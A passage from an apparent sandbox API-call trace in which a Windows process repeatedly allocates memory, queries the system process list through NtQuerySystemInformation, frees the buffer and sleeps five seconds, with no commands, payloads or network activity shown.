ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0224.273] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0224.275] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0224.275] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0224.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0224.434] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.435] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0224.437] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0224.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0224.439] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0224.439] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0224.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0224.575] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.575] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0224.577] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0224.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0224.648] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0224.649] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0224.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0224.781] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.782] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0224.783] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0224.784] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0224.785] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0224.785] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0224.785] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0224.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0224.910] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0224.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0224.913] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0224.914] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0224.915] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0224.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0225.061] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.062] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0225.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0225.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0225.065] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0225.065] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0225.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0225.223] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.224] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0225.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0225.226] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0225.227] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0225.227] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0225.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0225.379] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.398] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0225.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0225.400] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0225.401] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0225.401] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0225.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0225.552] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.553] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0225.556] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0225.557] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0225.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0225.558] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0225.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0225.698] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.699] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0225.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0225.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0225.702] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0225.703] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0225.703] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0225.871] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.872] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0225.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0225.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0225.875] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0225.875] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0225.876] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0225.990] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0225.990] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0225.992] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0225.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0225.993] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0225.994] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0225.994] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0226.105] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.106] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0226.107] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0226.107] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0226.108] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0226.109] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0226.109] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0226.214] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.215] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0226.216] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0226.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0226.217] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0226.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0226.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0226.335] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.336] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0226.337] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0226.338] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0226.339] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0226.339] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0226.340] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0226.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.484] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0226.486] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0226.486] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0226.487] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0226.487] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0226.487] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0226.635] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.635] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0226.637] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0226.637] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0226.638] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0226.638] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0226.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0226.747] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.748] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0226.749] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0226.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0226.750] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0226.750] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0226.751] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0226.849] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.850] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0226.852] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0226.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0226.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0226.853] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0226.854] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0226.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0226.987] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0226.988] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0226.989] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0226.990] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0226.990] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0226.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x4c0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x4c0000, ResultLength=0x0) returned 0x0 [0227.091] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x4c0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0227.092] NtDelayExecution (Alertable=0, Interval=0xdea70*=-50000000) returned 0x0 [0227.093] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea60*=0x0, ZeroBits=0x0, RegionSize=0xdea64*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea60*=0x1a0000, RegionSize=0xdea64*=0x10000) returned 0x0 [0227.093] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0227.094] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea84, FreeType=0x8000) returned 0x0 [0227.094] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea4c*=0x0, ZeroBits=0x0, RegionSize=0xdea50*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea4c*=0x4c0000, RegionSize=0xdea50*=0x20000) returned 0x0 [0227.095] 